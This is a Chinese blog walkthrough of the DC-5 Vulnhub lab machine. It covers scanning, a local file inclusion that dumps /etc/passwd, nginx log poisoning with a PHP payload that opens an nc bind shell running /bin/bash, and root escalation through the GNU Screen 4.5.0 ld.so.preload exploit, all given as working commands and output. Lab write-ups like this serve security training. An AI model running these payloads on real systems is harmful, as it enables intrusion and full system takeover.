DC-5 靶机渗透

最新推荐文章于 2022-05-21 08:30:00 发布
最新推荐文章于 2022-05-21 08:30:00 发布
阅读量214 收藏 1
点赞数
文章标签: linux java centos nginx docker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44911239/article/details/119890448
版权

DC-5 靶机渗透

1.渗透过程

  • 开始,扫描主机:
netdiscover -r 192.168.0.1/24

  • 找到一个 192.168.0.149 00:0c:29:cb:31:5f 1 60 VMware, Inc.

  • 扫端口:

nmap -sS -A -p- 192.168.0.149
  • 扫描结果:
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-26 14:36 CST
Nmap scan report for 192.168.0.149
Host is up (0.0019s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Welcome
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          38192/tcp  status
|_  100024  1          47477/udp  status
38192/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:CB:31:5F (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

  • 只有开启了 80 http 111:RPC 38192:RPC

  • 在下载的时候看到的描述:

  • As far as I am aware, there is only one exploitable entry point to get in (there is no SSH either). This particular entry point may be quite hard to identify, but it is there. You need to look for something a little out of the ordinary (something that changes with a refresh of a page). This will hopefully provide some kind of idea as to what the vulnerability might involve.
    据我所知,只有一个可利用的入口点(也没有SSH)。这个特定的入口点可能很难识别,但它就在那里。你需要寻找一些不寻常的东西(随着页面刷新而改变的东西)。这将有希望提供一些关于脆弱性可能涉及到什么的想法。

  • 我们需要寻找 >> 随着页面刷新而改变的东西

  • 翻翻他的网页最后在 提交留言之后的页面 >>

  • http://192.168.0.149/thankyou.php?firstname=11&lastname=11&country=britain&subject=111

  • 找到他的底部的 Copyright © 2019

  • 年份会变化,那也不知道哪里有漏洞啊

  • 先给他爆破个目录:

  • 然后爆出来:

200 OK-----http://192.168.0.149//index.php
200 OK-----http://192.168.0.149//contact.php
200 OK-----http://192.168.0.149//faq.php
200 OK-----http://192.168.0.149//footer.php
root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin 
sys:x:3:3:sys:/dev:/usr/sbin/nologin 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network 
Management,,,:/run/systemd/netif:/bin/false 
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false 
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false Debian-exim:x:104:109::/var/spool/exim4:/bin/false 
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
dc:x:1000:1000:dc,,,:/home/dc:/bin/bash mysql:x:108:113:MySQL
Server,,,:/nonexistent:/bin/false

  • 本地文件包含漏洞(LFI) 好办了 ^_^

  • 我们试试日志注入:

  • 前面 nmap 扫出web服务器是 nginx 1.6.2

  • 然后 nginx默认的访问日志在: /var/log/nginx/access.log

  • 直接输入: http://192.168.0.149/thankyou.php?file=/var/log/nginx/access.log 验证一下

  • 真包含进来了~ (ps:前面的爆破会产生大量日志内容,可能导致读不出内容,建议在爆破之前给靶机来个快照)

  • 我们直接用nc去连接他的80端口:

root@kali:~/workspace# nc 192.168.0.149 80
#直接写一个直连的shellcode
GET <?php system('nc -lvp 13123 -e /bin/bash');?> HTTP/1.1
#下面的自己生成的
HTTP/1.1 400 Bad Request
Server: nginx/1.6.2
Date: Sat, 25 Apr 2020 17:33:49 GMT
Content-Type: text/html
Content-Length: 172
Connection: close
# 返回信息:
<html>
<head><title>400 Bad Request</title></head>
<body bgcolor="white">
<center><h1>400 Bad Request</h1></center>
<hr><center>nginx/1.6.2</center>
</body>
</html>
python -c 'import pty;pty.spawn("/bin/bash")'

  • 得到标准控制台之后 就要想办法提权了

  • 先看看用户目录,发现只有一个dc 用户有用户目录

  • 里面啥也没有 再翻翻 /tmp 文件夹 也没

  • 先看看suid 的提权 

find / -user root -perm -4000 -print 2>/dev/null
  • 找出suid的文件
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/sbin/mount.nfs
  • 百度才知道 :screen-4.5.0 有一个提权漏洞
root@kali# searchsploit screen 4.5.0
GNU Screen 4.5.0 - Local Privilege Escalation  
| exploits/linux/local/41154.sh                                                                        
GNU Screen 4.5.0 - Local Privilege Escalation (PoC)  
| exploits/linux/local/41152.txt

  • 找到两个文件 直接用那个sh文件吧

  • 可以到自己的kali 运行一下,会产生两个文件并获得rootshell

-rwxr-xr-x 1 root root  1152 4月  26 15:57 41154.sh
-rwxr-xr-x 1 root root 16136 4月  26 15:57 libhax.so
-rwxr-xr-x 1 root root 16824 4月  26 15:57 rootshell

  • 然后我们用kali写一个sh文件: vim /tmp/run.sh

  • 内容是:

cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
  • 我们用 scp 拷贝到靶机里去
scp root@192.168.0.21:/tmp/libhax.so /tmp
#然后输入kali的密码
scp root@192.168.0.21:/tmp/rootshell /tmp
#然后输入kali的密码
scp root@192.168.0.21:/tmp/run.sh /tmp
  • 然后依次执行下面的语句或者写成shell脚本
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell

  • 给他个执行权限并运行 cd /tmp;chmod +x run.sh;./run.sh

  • 就可以得到一个rootshell了:

www-data@dc-5:~$ cd /tmp;chmod +x run.sh;./run.sh
cd /tmp;chmod +x run.sh;./run.sh
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!

# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
  • flag 就在/root下的thisistheflag.txt文件

THEEND!

Rex_Surprise
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DC-5主机渗透
weixin_65920814的博客
05-25 207
本文详细介绍DC-5主机渗透测试的全部内容
DC几个基础命令
热门推荐
WDWCSDN123的博客
03-27 3万+
create_clock clk -period 5 -waveform {0,2.5} 创建一个名为clk,周期为5ns,占空比为50%的时钟 set_dont_touch set_dont_touch_network 设置不希望被DC优化的模块,前者 对cell和net都可以使用,后者只能用于net set_clock_transition 设置时钟转换时间,指从时钟高电平的10%到达时钟高...
DC-5靶机渗透
m0_62008601的博客
05-21 653
攻击机kali:192.168.56.102(桥接网络) 靶机dc-5:192.168.56.106 (仅主机网络) 两台主机的ip设置在同一网段之后开始扫描存活主机: 扫描端口: nmap -sV -p- 192.168.56.106 80端口开放,用浏览器进行访问 并没有发现什么信息 wappalyzer插件中可以看到web服务器为nginx,接着在页面摸索一番,发现contact下可以提交表单 随便输入信息提交之后我们发现跳转到了另外一个页面且发现底部的年份发生了..
dubbo、dubbox、motan、thrift、grpcRPC框架比较及选型
weixin_30648963的博客
10-28 2205
概述 前段时间项目要做服务化,所以我比较了现在流行的几大RPC框架的优缺点以及使用场景,最终结合本身项目的实际情况选择了使用dubbox作为rpc基础服务框架。下面就简单介绍一下RPC框架技术选型的过程。 RPC简述 该系列文章将讲述以下RPC框架的helloword实例以及其实现原理简述,由于每一种RPC框架的原理实现不同且都比较复杂,如果想深入研究还请自行到官网或者其他技术博客学习。R...
RPC远程调用
lin_FS的专栏
08-06 1万+
第十一章 RPC远程过程调用          在顾客服务员模型中,进程之间的相互作用是由一个进程先向另一个进程发送一个报文请求服务,然后等待回答;服务进程接收一个请求,然后发送回答。这样一种交互作用很象通常意义的过程调用。但是在计算机网络系统中,这种调用可能在不同的机器上执行,因此称为远程过程调用(remote procedure call)。远程过程调用的基础是XDR协议。   1
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC5靶机渗透测试
Huangshanyoumu的博客
04-17 404
文章目录环境版本:一、信息收集1.主机发现2.端口扫描二、漏洞发现1.访问靶机 web 服务2.尝试利用文件包含漏洞3.尝试将恶意文件写入日志4.利用文件包含访问日志并进行利用三、提权1.查看可以 root 权限使用的命令2.漏洞搜索3.查找 exp,并查看内容4.使用 ftp 进行传输文件 环境版本: VMware pro 16 Kali 2021.1(虚拟机) DC-5(虚拟机) 一、信息收集 1.主机发现 arp-scan -l 2.端口扫描 nmap -A -p- 192.168.2.186
DC系列(5)DC-5靶机渗透
Nikris的博客
01-12 1000
DC-5
Vulnhub靶机实战——DC-5
冠霖L的博客
10-27 4864
靶机DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip 环境:VMware 15虚拟机软件 DC-5靶机IP地址:192.168.220.139 Kali的IP地址:192.168.220.145 DC-5靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.145 ...
DC-5 vulnhub靶机实战
Cosmopolitan的博客
06-16 2515
首先是使用virtualbox安装,这里不推荐vmware,会出很多问题。 nmap扫一下子网,看靶机的ip地址: 发现ip是192.168.240.137,开放了80和111端口。 给了提示是个文件包含漏洞,发现在thinkyou.php里面存在,验证一下。 可以读到/etc/passwd文件。 接下来就可以利用nginx的日志记录功能,将一句话写入到access.log里面,然后用tha...
dc-5靶机渗透笔记
现代鲁滨逊的博客
05-12 267
1.发现主机 192.168.14.153 2.开启nmap端口扫描,开放了80,111,37620端口 3.访问站点,啥也没有 4.扫描后台文件,还是啥也没有 5. 然后看别人的笔记就是,每刷新一次thankyou.php,页尾的年份就会更新,别人扫出了个footer.php,推断出thankyou.php会包含footer.php,然后就猜想有文件包含漏洞,至于传递的参数是file应该是爆破出来的。 6. 尝试读取/etc/passwd文件 7.想尝试远程文件包含,但是不知道
渗透DC-5-文件包含
告白的博客
08-13 305
0x00 环境介绍 本次研究DC系列dc-5渗透提权过程 靶机下载:https://www.vulnhub.com/entry/dc-5,314/ 0x01 信息收集 1)IP收集----192.168.213.153 arp-scan -l 2)端口扫描----80/tcp open http nginx 1.6.2 nmap -A -p- 192.168.213.153 3)目录爆破,使用dirbuster,调用kali自带的字典, 字典位置:usr/share/wordlists/d
DC-5
per_se_veran_ce的博客
10-07 453
1、发现目标主机,信息收集 开放端口80,111,59888 2、访问80端口 尝试提交留言 刷新一次年份变化一次 http://192.168.168.203/thankyou.php?firstname=1&lastname=1&country=australia&subject=1 3、御剑扫描敏感目录 4、逐步去试,发现footer.php...
Kali渗透DC:5
qq_50905066的博客
03-28 4211
与前面相同,我们从官网下载DC:5的镜像文件并打开,同时打开Kali使用Namp工具进行扫描 排除过大与过小和本机的地址就得到了靶机地址,对靶机进行端口扫描 发现靶机开启了http服务80端口,浏览器打开靶 搜集信息发展靶机web页面由ngiax服务器并使用wfuzz扫描到参数file,我们为file添加参数得到信息 看到日志信息,这是我们通过Burpsuite 抓包,上传木马至靶机日志文件 上传脚本之后使用中华蚁剑链接 链接成功,查看用户权限 登录用户...
DC-5入门练习
Mr_helloword的博客
07-20 560
DC-5靶机渗透 1. 信息收集 1.查看dc-5主机mac地址 2. nmap扫描 nmap -sP 192.168.1.0/24 -oN nmap.sP nmap -A 192.168.1.6 -p 0-6635 -oN nmap.A 发现目标靶机地址为192.168.1.6 查看目标主机开放那些端口 由于开发80我们登录随便看一看 这些网站页面都放在根目录下,我们可以用御剑扫描后台,发现最后一个页面这里可以提交表单,参数(都显示在url里) 发现每次刷新网页下面都会变化 2.御剑扫描
渗透DC-1靶机设计思路
最新发布
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值